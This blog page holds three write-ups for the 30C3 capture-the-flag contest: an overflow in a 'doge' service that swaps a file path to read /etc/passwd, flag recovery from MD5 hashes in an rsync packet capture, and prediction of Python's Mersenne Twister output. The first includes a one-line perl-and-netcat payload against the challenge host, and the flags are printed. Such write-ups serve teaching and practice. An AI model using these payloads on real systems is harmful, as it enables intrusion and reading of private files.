A disturbing lack of taste. Just another WordPress site

30Dec/133

30C3 CTF – DOGE1 Writeup

This challenges was PWN one. We have remote server that offer a doge dog service (you can give it a name, feed it, show the image etc..). The image shown its an ASCII art taken from a file where it's path can be overwritten by overflowing the doge's name like this:

perl -e 'print "A"x32 . "/etc//////////////passwd"' | nc 88.198.89.218 1024

Now the new doge's "face" will be /etc/passwd that show us our flag:

doge:30C3_51dd250e0adb864ff40cc40b818852f4:1001:1001:,,,:/home/doge:/bin/false

I put so many slashes in /etc/passwd because for working you need to have the same chars as the original file 'ascii_art_doge_color.txt' else it would open: '/etc/passwdoge_color.txt'

Credit goes to immerse that solved it first, Razor4x

Filed under: Uncategorized 3 Comments
30Dec/134

30C3 CTF – rsync Writeup

The task give us a pcap containing a small rsync communication. Looking deeply into it we we'll see that the rsync client is trying to retrive a file using the module "flag" but the there isn't any transferring of it actually. But looking on wireshark at the biggest block sized 412 you will some interesting things. First of all I extracted an hex stream of the packet and then replaced the 00 with | for make it more clear. After that you can see some MD5 hashes "padded" with strings like "ba04..." or "ba05...", except one. Like this:

ba 05 01 30    e1906c422714eb1385315767c466f30b (30C)
ba 05 01 32    aa557033e5bc8091a88db5915c8a04bb (2d7)
ba 05 01 33    2e1c6ef401c6f4e66790a9df179b885f (1b4)
ba 05 01 36    1543843a4723ed2ab08e18053ae6dc5b (395)
ba 05 01 37    a23e10ddc6117ee143b1241b024c7e54 (8e9)
ba 05 01 39    17b9d2ad2691d639cacb18811c7f1add (c67)

ba 04 02 30 31  bf9eef1e9fe88aa3a54c6ca03e862b12 (3_b)
ba 04 02 30 34  f79921bbae40a577928b76d2fc3edc2a (688)
ba 04 02 30 35  013d407166ec4fa56eb1e1f8cbe183b9 (138)
ba 04 02 31 30  a4d751f128596dee5517d8a007e6ea02 (be4)
ba 04 02 31 31  b597e5b0e7970deda3d6cf8017b929b7 (a7e)
ba 04 02 31 32  e3a52fecab0b4e8125873849cd99103a (e\x0a\x00)

c0 fe ff       39c4de73711fea02c5468558541ea581 (5db)

Now, cracking those hashes it's fairly easy, just google them. It's all 3-chars strings and putting them together like I did up here its clearly the flag! But this isn't enough infact they are shuffled and we need to order them in the correct way. But first we can immediatly recognise what is the start and end. All flag in this CTF starts with 30C3_ so the start will be: 30C_3b (e1906c422714eb1385315767c466f30b+bf9eef1e9fe88aa3a54c6ca03e862b12)  while the end is 'e' (e3a52fecab0b4e8125873849cd99103a) because is followed by the terminator chars (newline+nullbyte) that ends a string.

I coded a little script for find this hash, since google failed:

http://pastebin.com/9UN6V8MT

For retrive the indexes to sort the others just look at the offset (remeber the "padding"?) and the last numbers e.g:

ba 04 02 30 35  013d407166ec4fa56eb1e1f8cbe183b9 (138)

this part of flag has index '05' because the hex of the last 2 chars is 0x3035 that is 05

ba 04 02 31 31  b597e5b0e7970deda3d6cf8017b929b7 (a7e)

this part of flag has index '11' beacuse the hex last 2 chars is 0x3131 that is 11

ba 05 01 33    2e1c6ef401c6f4e66790a9df179b885f (1b4)

this part of flag has index '3' because the hex of the last char is 0x33 that is 3

and so on for the others. Now that we have the indexes of every single part of the flag just sort them out and the final string will be:  30C3_b2d71b46881383958e95dbc67be4a7ee

Razor4x

Filed under: Uncategorized 4 Comments
30Dec/130

30C3 CTF – guess Writeup

In this challenge we have a guessing game based on a python server. For win we have to guess correctly 10 times consecutively. The random number is extracted from the python random module using as seed a number from os.urandm. The number we'll have to guess will be extracted by the getrandbits(64)  that will outputs a 64 bit number. Luckly for us this function is supplied using the MersenneTwister generator that is known for some its weakness about generating pseudo random numbers. For further information about how works the PRNG, MT, and randomness in python have a look at these links:

http://blog.ptsecurity.com/2012/10/random-number-security-in-python.html

http://jazzy.id.au/default/2010/09/22/cracking_random_number_generators_part_3.html

Now basically what we are going to do is:

- build on the client a random object

- thanks to the output that the server provide us, take the internal state of the object on the server

- replace the internal state of our object on clientside with the one we obtained from the server

- generate the next numbers and send them on the server to take the flag

Code (highly commented):

http://pastebin.com/3rmZmZRL

Flag: 30C3_b9b1579866cccd28b1918302382c9107

Razor4x

Filed under: Uncategorized No Comments